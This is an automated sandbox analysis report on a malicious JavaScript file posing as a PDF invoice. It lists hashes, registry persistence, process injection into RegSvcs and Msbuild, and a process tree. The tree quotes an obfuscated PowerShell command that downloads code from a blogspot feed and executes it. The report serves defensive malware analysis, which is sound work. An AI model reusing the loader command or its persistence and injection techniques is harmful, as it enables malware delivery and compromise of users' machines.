Analysis
-
max time kernel
141s -
max time network
272s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2023 13:23
Static task
static1
Behavioral task
behavioral1
Sample
lnvoice-1597256897.pdf.js
Resource
win10v2004-20231020-en
General
-
Target
lnvoice-1597256897.pdf.js
-
Size
79KB
-
MD5
6ad3ba5c57ad42f2915166df9b09417d
-
SHA1
b24e0268f97de481f65827a8604c21dfaa598839
-
SHA256
4b908a89d4b36d13f8a39f7c9d464d19b1378cd924f0e2319684fb77ffe8ff0b
-
SHA512
d8c40786019d424ae0d258d43a15788f4ad95ffe4eb12dcd132c10cbc9812f8d316257a3d16f5f8dcf235ceb22d7ee4ea1ff24beb9739039d5cb0372181b7d83
-
SSDEEP
48:/bH8kOofHb/hyWdawjJuF7ejZVt2LGLKY:/DOofcWIwjJuF7itmY
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 8 3580 powershell.exe 12 3580 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation wscript.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tname = "schtasks /run /tn Deefendeswconsossl1" powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 32 api.ipify.org 33 api.ipify.org -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3580 set thread context of 2912 3580 powershell.exe 97 PID 3580 set thread context of 4728 3580 powershell.exe 98 PID 3580 set thread context of 4040 3580 powershell.exe 99 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3580 powershell.exe 3580 powershell.exe 3580 powershell.exe 3580 powershell.exe 3580 powershell.exe 3580 powershell.exe 2912 RegSvcs.exe 2912 RegSvcs.exe 2912 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3580 powershell.exe Token: SeRestorePrivilege 1536 dw20.exe Token: SeBackupPrivilege 1536 dw20.exe Token: SeBackupPrivilege 1536 dw20.exe Token: SeBackupPrivilege 1816 dw20.exe Token: SeBackupPrivilege 1816 dw20.exe Token: SeBackupPrivilege 1536 dw20.exe Token: SeBackupPrivilege 1536 dw20.exe Token: SeIncreaseQuotaPrivilege 3580 powershell.exe Token: SeSecurityPrivilege 3580 powershell.exe Token: SeTakeOwnershipPrivilege 3580 powershell.exe Token: SeLoadDriverPrivilege 3580 powershell.exe Token: SeSystemProfilePrivilege 3580 powershell.exe Token: SeSystemtimePrivilege 3580 powershell.exe Token: SeProfSingleProcessPrivilege 3580 powershell.exe Token: SeIncBasePriorityPrivilege 3580 powershell.exe Token: SeCreatePagefilePrivilege 3580 powershell.exe Token: SeBackupPrivilege 3580 powershell.exe Token: SeRestorePrivilege 3580 powershell.exe Token: SeShutdownPrivilege 3580 powershell.exe Token: SeDebugPrivilege 3580 powershell.exe Token: SeSystemEnvironmentPrivilege 3580 powershell.exe Token: SeRemoteShutdownPrivilege 3580 powershell.exe Token: SeUndockPrivilege 3580 powershell.exe Token: SeManageVolumePrivilege 3580 powershell.exe Token: 33 3580 powershell.exe Token: 34 3580 powershell.exe Token: 35 3580 powershell.exe Token: 36 3580 powershell.exe Token: SeDebugPrivilege 2912 RegSvcs.exe Token: SeIncreaseQuotaPrivilege 3580 powershell.exe Token: SeSecurityPrivilege 3580 powershell.exe Token: SeTakeOwnershipPrivilege 3580 powershell.exe Token: SeLoadDriverPrivilege 3580 powershell.exe Token: SeSystemProfilePrivilege 3580 powershell.exe Token: SeSystemtimePrivilege 3580 powershell.exe Token: SeProfSingleProcessPrivilege 3580 powershell.exe Token: SeIncBasePriorityPrivilege 3580 powershell.exe Token: SeCreatePagefilePrivilege 3580 powershell.exe Token: SeBackupPrivilege 3580 powershell.exe Token: SeRestorePrivilege 3580 powershell.exe Token: SeShutdownPrivilege 3580 powershell.exe Token: SeDebugPrivilege 3580 powershell.exe Token: SeSystemEnvironmentPrivilege 3580 powershell.exe Token: SeRemoteShutdownPrivilege 3580 powershell.exe Token: SeUndockPrivilege 3580 powershell.exe Token: SeManageVolumePrivilege 3580 powershell.exe Token: 33 3580 powershell.exe Token: 34 3580 powershell.exe Token: 35 3580 powershell.exe Token: 36 3580 powershell.exe Token: SeIncreaseQuotaPrivilege 3580 powershell.exe Token: SeSecurityPrivilege 3580 powershell.exe Token: SeTakeOwnershipPrivilege 3580 powershell.exe Token: SeLoadDriverPrivilege 3580 powershell.exe Token: SeSystemProfilePrivilege 3580 powershell.exe Token: SeSystemtimePrivilege 3580 powershell.exe Token: SeProfSingleProcessPrivilege 3580 powershell.exe Token: SeIncBasePriorityPrivilege 3580 powershell.exe Token: SeCreatePagefilePrivilege 3580 powershell.exe Token: SeBackupPrivilege 3580 powershell.exe Token: SeRestorePrivilege 3580 powershell.exe Token: SeShutdownPrivilege 3580 powershell.exe Token: SeDebugPrivilege 3580 powershell.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 4908 wrote to memory of 3580 4908 wscript.exe 85 PID 4908 wrote to memory of 3580 4908 wscript.exe 85 PID 3580 wrote to memory of 2912 3580 powershell.exe 97 PID 3580 wrote to memory of 2912 3580 powershell.exe 97 PID 3580 wrote to memory of 2912 3580 powershell.exe 97 PID 3580 wrote to memory of 2912 3580 powershell.exe 97 PID 3580 wrote to memory of 2912 3580 powershell.exe 97 PID 3580 wrote to memory of 2912 3580 powershell.exe 97 PID 3580 wrote to memory of 2912 3580 powershell.exe 97 PID 3580 wrote to memory of 2912 3580 powershell.exe 97 PID 3580 wrote to memory of 4728 3580 powershell.exe 98 PID 3580 wrote to memory of 4728 3580 powershell.exe 98 PID 3580 wrote to memory of 4728 3580 powershell.exe 98 PID 3580 wrote to memory of 4728 3580 powershell.exe 98 PID 3580 wrote to memory of 4728 3580 powershell.exe 98 PID 3580 wrote to memory of 4728 3580 powershell.exe 98 PID 3580 wrote to memory of 4728 3580 powershell.exe 98 PID 3580 wrote to memory of 4728 3580 powershell.exe 98 PID 3580 wrote to memory of 4040 3580 powershell.exe 99 PID 3580 wrote to memory of 4040 3580 powershell.exe 99 PID 3580 wrote to memory of 4040 3580 powershell.exe 99 PID 3580 wrote to memory of 4040 3580 powershell.exe 99 PID 3580 wrote to memory of 4040 3580 powershell.exe 99 PID 3580 wrote to memory of 4040 3580 powershell.exe 99 PID 3580 wrote to memory of 4040 3580 powershell.exe 99 PID 3580 wrote to memory of 4040 3580 powershell.exe 99 PID 4040 wrote to memory of 1816 4040 Msbuild.exe 100 PID 4040 wrote to memory of 1816 4040 Msbuild.exe 100 PID 4040 wrote to memory of 1816 4040 Msbuild.exe 100 PID 4728 wrote to memory of 1536 4728 RegSvcs.exe 101 PID 4728 wrote to memory of 1536 4728 RegSvcs.exe 101 PID 4728 wrote to memory of 1536 4728 RegSvcs.exe 101
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\lnvoice-1597256897.pdf.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c $((irm busizinusa.blogspot.com///////////////////////////////////atom.xml) | .('{1}{0}'-f'XXXWww','I').replace('XXXWww','ex'))2⤵
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82